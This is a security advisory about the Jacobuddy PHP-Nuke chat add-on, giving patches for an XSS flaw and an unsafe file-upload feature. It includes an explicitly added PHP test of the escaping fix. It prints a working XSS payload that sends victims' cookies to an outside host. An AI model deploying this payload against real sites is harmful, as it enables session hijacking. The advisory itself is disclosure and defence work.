Security: Jacobuddy Cross Site Scripting (XSS) And Upload Exploit
Officially Released For Publication by Computer Cops.

Jacobuddy, a JavaScript real-time chat module, is an independent add-on for the open source GNU/GPL content management system PHP-Nuke. Computer Cops has discovered that Jacobuddy version 3.0 is vulnerable to Cross Site Scripting (XSS) and file system manipulation. We believe in contacting the author prior to a public posting, but in this case we have supplied a fix for both vulnerabilities of this add-on.

The following URL is a sample of how Jacobuddy can be seeded with an XSS exploit within the message body:

http://www.laudanski.com/"style="background-image:url(javascript:nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;document.URL=nurl)

In the current unpatched version, the receiver's pop-up Jacobuddy message automatically redirects to another site, which grabs their cookie information from the attacked site.

The patch for this is applied to the buddy.php file:

In the following function block:

function send($to, $to_userid, $message, $subject) {

Add the following line after the global statement:

$message = htmlspecialchars(strip_tags($message));
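
The effect of this line on the sample message above, as an added example (not Jacobuddy's or Computer Cops' code). render_link() is a hypothetical stand-in for how a module might place message text inside an attribute, the single-quote case goes beyond what the advisory covers, and the script assumes PHP's DOM extension is available:

```php
<?php
// Added example; not Jacobuddy code. render_link() is a hypothetical stand-in
// for a chat module that places message text inside an HTML attribute.

// The advisory's fix with flags made explicit. htmlspecialchars() defaulted to
// ENT_COMPAT (escapes " but not ') before PHP 8.1 and to ENT_QUOTES since.
function sanitize_compat(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_COMPAT, 'UTF-8');
}

// Same fix, also escaping single quotes for templates that use '...' attributes.
function sanitize_quotes(string $message): string {
    return htmlspecialchars(strip_tags($message), ENT_QUOTES, 'UTF-8');
}

// Hypothetical renderer: $q is the quote character the template uses.
function render_link(string $message, string $q = '"'): string {
    return "<a href={$q}{$message}{$q}>link</a>";
}

// Parse the markup with an HTML parser and list the attributes on <a>.
// Anything other than "href" means the message escaped its attribute.
function anchor_attributes(string $html): array {
    $doc = new DOMDocument();
    @$doc->loadHTML($html);   // @: libxml warns on malformed markup
    $names = [];
    foreach ($doc->getElementsByTagName('a')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Sample message from the advisory, and a constructed single-quote variant.
$sample = 'http://www.laudanski.com/"style="background-image:url(javascript:'
        . "nurl='http://www.laudanski.com/j.cgi?';nurl=nurl+document.cookie;"
        . 'document.URL=nurl)';
$single = "http://example.invalid/'style='color:red";   // constructed

$cases = [
    'unpatched, "..." attribute'  => render_link($sample),
    'page fix, "..." attribute'   => render_link(sanitize_compat($sample)),
    "ENT_COMPAT, '...' attribute" => render_link(sanitize_compat($single), "'"),
    "ENT_QUOTES, '...' attribute" => render_link(sanitize_quotes($single), "'"),
];
foreach ($cases as $label => $html) {
    echo str_pad($label, 30), implode(',', anchor_attributes($html)), "\n";
}
```

A row listing any attribute besides href marks a combination where the message text broke out of the attribute it was placed in.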

The next vulnerability is the infamous dcc file transfer within the buddy.php file.

Any file uploaded into the system can stay on the system. A malicious script can be written to grab vital file system data, such as the PHP-Nuke config.php file, and turn it into a text file for the malicious uploader to access. Computer Cops highly advises that the entire dcc function be removed from the file, in addition to the dcc case block and the $who_online clause for the dcc link.

Computer Cops will make an attempt to contact the vendor with this information.
Posted on Saturday, March 01 @ 23:44:02 CET by Zhen-Xjell
 